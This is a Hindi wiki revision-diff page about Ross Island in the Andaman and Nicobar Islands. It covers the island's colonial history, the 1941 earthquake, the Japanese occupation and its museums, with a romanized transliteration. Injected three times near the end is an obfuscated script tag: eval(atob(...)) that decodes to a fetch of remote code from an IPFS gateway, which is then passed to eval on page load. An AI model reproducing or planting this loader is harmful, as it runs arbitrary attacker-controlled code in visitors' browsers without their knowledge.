Difference between revisions of "रॉस द्वीप"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "करीब" to "क़रीब")
Line 1: Line 1:
 
[[चित्र:Ross-Island-Andaman.jpg|thumb|250px|रॉस द्वीप, [[अंडमान एवं निकोबार द्वीपसमूह]]]]
 
[[चित्र:Ross-Island-Andaman.jpg|thumb|250px|रॉस द्वीप, [[अंडमान एवं निकोबार द्वीपसमूह]]]]
'''रॉस द्वीप''' [[अंडमान एवं निकोबार द्वीपसमूह]] में स्थित एक ऐतिहासिक धरोहर है। [[इतिहास]] में दिलचस्पी रखने वाले पर्यटकों के लिए रॉस द्वीप बेहतरीन जगह है।  
+
'''रॉस द्वीप''' [[अंडमान एवं निकोबार द्वीपसमूह]] में स्थित एक ऐतिहासिक धरोहर है। [[इतिहास]] में दिलचस्पी रखने वाले पर्यटकों के लिए रॉस द्वीप बेहतरीन जगह है। किसी जमाने में यह [[ब्रिटिश शासन]] की गद्दी और इन द्वीपों की राजधानी हुआ करता था। अब यहाँ अधिकतर टूटे-फूटे पुराने ढाँचों के साथ बीते दिनों के खंडहर हैं। यहॉं पर 'स्मृतिका' नामक छोटा संग्रहालय है, जिसमें इन द्वीपों से सम्बंधित फोटो ग्राफ और [[अंग्रेज़|अंग्रेज़ों]] की अन्य दुर्लभ चीजें रखी गई हैं।
*रॉस द्वीप 200 एकड़ में फैला हुआ है। फीनिक्स उपसागर से नाव के द्वारा रॉस द्वीप पहुंचा जा सकता है।  
+
==इतिहास==
*कभी यह ग्रेट अंडमानी आदिवासियों का अधिवास था।  
+
रॉस द्वीप 200 एकड़ में फैला हुआ है। फीनिक्स उपसागर से नाव के द्वारा रॉस द्वीप पहुंचा जा सकता है। कभी यह [[द्वीप]] ग्रेट अंडमानी आदिवासियों का अधिवास था। अंग्रेज़ी शासन काल के दौरान अंडमान एवं निकोबार द्वीप समूह का मुख्यालय रॉस द्वीप में था। अंग्रेज़ी शासन काल के दौरान इसे 'पूरब का पेरिस' कहते थे, लेकिन [[1941]] में आए [[भूकंप]] ने इसे बुरी तरह उजाड़ दिया। अब यहाँ कुछ [[अवशेष]] ही बचे हैं, लेकिन पर्यटकों की दिलचस्पी इनमें भी रहती है।
*अंग्रेज़ी शासनकाल के दौरान अंडमान एवं निकोबार द्वीपसमूह का मुख्यालय रॉस द्वीप में था।  
+
====जापानी आधिपत्य====
*अंग्रेज़ी शासनकाल के दौरान इसे 'पूरब का पेरिस' कहते थे, लेकिन 1941 में आए [[भूकंप]] ने इसे बुरी तरह उजाड़ दिया। अब यहाँ कुछ [[अवशेष]] ही बचे हैं, लेकिन पर्यटकों की दिलचस्पी इनमें भी रहती है।  
+
यह द्वीप [[1858]]-[[1941]] तक अंडमान एवं निकोबार द्वीपसमूह की राजधानी भी रहा, पर जापानियों ने इस पर कब्ज़ा करने के बाद इसे ग्रेट अंडमानीज की स्थली होने के कारण इसे 'पीपुल ऑफ़ वारष् साइट' में तब्दील कर दिया। द्वीप अब ब्रिटिश वास्तुशिल्प के खंडहरों के लिए प्रसिद्ध है। यहाँ अभी भी चर्च और चीफ कमिश्नर के बंगले के [[अवशेष]] देखे जा सकते हैं। सुबह के समय रॉस द्वीप पक्षी प्रेमियों के लिए स्वर्ग के समान है। [[द्वीप]] में समुद्रिका म्यूजियम का भी खासा प्रभाव है। [[भारतीय नौसेना]] द्वारा संचालित यह म्यूजियम अंडमान के हर पहलू को क़रीब से दिखाता है।
*रॉस द्वीप 1858-1941 तक अंडमान एवं निकोबार द्वीपसमूह की राजधानी भी रहा, पर जापानियों ने इस पर कब्ज़ा करने के बाद इसे ग्रेट अंडमानीज की स्थली होने के कारण इसे ष्पीपुल ऑफ़ वारष् साइट में तब्दील कर दिया।  
 
*रॉस द्वीप अब ब्रिटिश वास्तुशिल्प के खंडहरों के लिए प्रसिद्ध है।  
 
*रॉस द्वीप में अभी भी चर्च और चीफ कमिश्नर के बंगले के अवशेष देखे जा सकते हैं।  
 
*सुबह के समय रॉस द्वीप पक्षी प्रेमियों के लिए स्वर्ग के समान है।
 
*रॉस द्वीप में समुद्रिका म्यूजियम का भी खासा प्रभाव है।  
 
*[[भारतीय नौसेना]] द्वारा संचालित यह म्यूजियम अंडमान के हर पहलू को क़रीब से दिखाता है।  
 
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 06:14, 13 August 2012

[[chitr:Ross-Island-Andaman.jpg|thumb|250px|r aaus dvip, aandaman evan nikobar dvipasamooh]] r aaus dvip aandaman evan nikobar dvipasamooh mean sthit ek aitihasik dharohar hai. itihas mean dilachaspi rakhane vale paryatakoan ke lie r aaus dvip behatarin jagah hai. kisi jamane mean yah british shasan ki gaddi aur in dvipoan ki rajadhani hua karata tha. ab yahaan adhikatar toote-phoote purane dhaanchoan ke sath bite dinoan ke khandahar haian. yah aauan par 'smritika' namak chhota sangrahalay hai, jisamean in dvipoan se sambandhit photo graph aur aangrezoan ki any durlabh chijean rakhi gee haian.

itihas

r aaus dvip 200 ek d mean phaila hua hai. phiniks upasagar se nav ke dvara r aaus dvip pahuancha ja sakata hai. kabhi yah dvip gret aandamani adivasiyoan ka adhivas tha. aangrezi shasan kal ke dauran aandaman evan nikobar dvip samooh ka mukhyalay r aaus dvip mean tha. aangrezi shasan kal ke dauran ise 'poorab ka peris' kahate the, lekin 1941 mean ae bhookanp ne ise buri tarah uja d diya. ab yahaan kuchh avashesh hi bache haian, lekin paryatakoan ki dilachaspi inamean bhi rahati hai.

japani adhipaty

yah dvip 1858-1941 tak aandaman evan nikobar dvipasamooh ki rajadhani bhi raha, par japaniyoan ne is par kabza karane ke bad ise gret aandamanij ki sthali hone ke karan ise 'pipul aauf varashh sait' mean tabdil kar diya. dvip ab british vastushilp ke khandaharoan ke lie prasiddh hai. yahaan abhi bhi charch aur chiph kamishnar ke bangale ke avashesh dekhe ja sakate haian. subah ke samay r aaus dvip pakshi premiyoan ke lie svarg ke saman hai. dvip mean samudrika myoojiyam ka bhi khasa prabhav hai. bharatiy nausena dvara sanchalit yah myoojiyam aandaman ke har pahaloo ko qarib se dikhata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

[[chitr:Ross-Island-1.jpg|thumb|600px|center|r aaus dvip, aandaman evan nikobar dvipasamooh]]

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>